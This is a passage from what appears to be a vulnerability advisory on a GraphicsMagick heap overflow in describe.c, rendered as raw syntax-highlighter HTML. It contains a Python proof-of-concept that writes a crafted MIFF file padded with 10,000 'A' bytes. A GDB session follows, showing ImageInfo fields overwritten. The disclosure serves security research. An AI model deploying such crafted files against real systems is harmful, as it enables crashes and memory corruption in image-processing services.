class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span 
class=\"crayon-v\">definitions<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bf963080980-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Image<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">attributes<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ping<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bf963080980-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">PreviewType <\/span><span class=\"crayon-v\">preview_type<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">affirm<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bf963080980-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">_BlobInfoPtr_ <\/span><span class=\"crayon-v\">blob<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">size_t <\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-59f8f774244bf963080980-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unique<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2053<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">zero<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2053<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bf963080980-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">long<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">signature<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-17\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0017 seconds] -->  <\/p>\n<p>One possible way to trigger the vulnerability is to run the <code><em>identify<\/em><\/code> command on a specially crafted MIFF format file with the verbose flag.<\/p>\n<p><u>Proof of Concept<\/u><br \/> The following proof of concept script will generate a specially crafted MIFF file <code>exploit.miff<\/code>.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59f8f774244c2624867613\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; 
line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">Python<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/python    from pwn import *    partitions = (&#8216;id=ImageMagick  version=1.0nclass=DirectClass  matte=Falsen&#8217; +                &#8216;columns=1  rows=1  depth=16nscene=1nmontage=1&#215;1+0+0nx0cn&#8217; +                &#8216;:x1a&#8217;,                &#8216;nx00xbexbexbexbexbexben&#8217;)  output = &#8220;exploit.miff&#8221;    def main():      payload = &#8220;A&#8221;*10000      
payload = partitions[0] + payload + partitions[1]      file(output, &#8220;w&#8221;).write(payload)    if __name__ == &#8220;__main__&#8221;:      main()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c2624867613-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c2624867613-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c2624867613-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c2624867613-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c2624867613-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c2624867613-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c2624867613-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c2624867613-16\">16<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-59f8f774244c2624867613-17\">17<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-1\"><span class=\"crayon-c\">#!\/usr\/bin\/python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c2624867613-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-3\"><span class=\"crayon-st\">from<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pwn <\/span><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c2624867613-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-5\"><span class=\"crayon-v\">partitions<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;id=ImageMagick&nbsp;&nbsp;version=1.0nclass=DirectClass&nbsp;&nbsp;matte=Falsen&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c2624867613-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;columns=1&nbsp;&nbsp;rows=1&nbsp;&nbsp;depth=16nscene=1nmontage=1&#215;1+0+0nx0cn&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;:x1a&#8217;<\/span><span 
class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c2624867613-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;nx00xbexbexbexbexbexben&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-9\"><span class=\"crayon-v\">output<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;exploit.miff&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c2624867613-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-11\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c2624867613-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;A&#8221;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-cn\">10000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">partitions<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">payload<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">partitions<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c2624867613-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">file<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;w&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c2624867613-16\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__name__<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;__main__&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0018 seconds] -->  <\/p>\n<p>Running the GraphicsMagick <code>gm<\/code> utility with the arguments <code>identify -verbose<\/code> in GDB and breaking after the vulnerable <code>strncpy<\/code> call, and examining the corrupted <code>ImageInfo<\/code> object demonstrates that the heap corruption was successful.<\/p>\n<\/p>\n<p><!-- Crayon 
Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59f8f774244c4155423934\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> gef\u27a4  r identify -verbose exploit.miff  &#8230;  gef\u27a4  br describe.c:856  Breakpoint 1 at 0x4571df: file magick\/describe.c, line 856.  
&#8230;  gef\u27a4  p *image_info  $3 = {  &#8230;    compression = UndefinedCompression,    file = 0x0,    magick = &#8216;\u000000&#8217; &lt;repeats 2052 times&gt;,    filename = &#8216;A&#8217; &lt;repeats 2053 times&gt;,    cache = 0x4141414141414141,    definitions = 0x4141414141414141,    attributes = 0x4141414141414141,    ping = 0x41414141,    preview_type = 1094795585,    affirm = 0x41414141,    blob = 0x4141414141414141,    length = 0x4141414141414141,    unique = &#8216;A&#8217; &lt;repeats 2053 times&gt;,    zero = &#8216;A&#8217; &lt;repeats 2053 times&gt;,    signature = 0x4141414141414141  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-12\">12<\/div>\n<div 
class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-24\">24<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-1\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">identify<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">verbose <\/span><span class=\"crayon-v\">exploit<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">miff<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-2\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-3\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">br <\/span><span class=\"crayon-v\">describe<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">856<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-4\"><span class=\"crayon-i\">Breakpoint<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">at<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4571df<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">file <\/span><span class=\"crayon-v\">magick<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">describe<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">line<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">856.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-5\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-6\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">p *<\/span><span class=\"crayon-v\">image<\/span><span class=\"crayon-sy\">_<\/span>info<\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-7\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-8\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-9\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">compression<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">UndefinedCompression<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-10\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">magick<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\u000000&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2052<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-12\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2053<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-13\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cache<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4141414141414141<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-14\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">definitions<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4141414141414141<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-15\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">attributes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4141414141414141<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-16\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ping<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x41414141<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-17\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">preview_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1094795585<\/span><span 
class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-18\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">affirm<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x41414141<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-19\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">blob<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4141414141414141<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-20\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4141414141414141<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-21\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">unique<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2053<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-22\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">zero<\/span><span class=\"crayon-h\"> 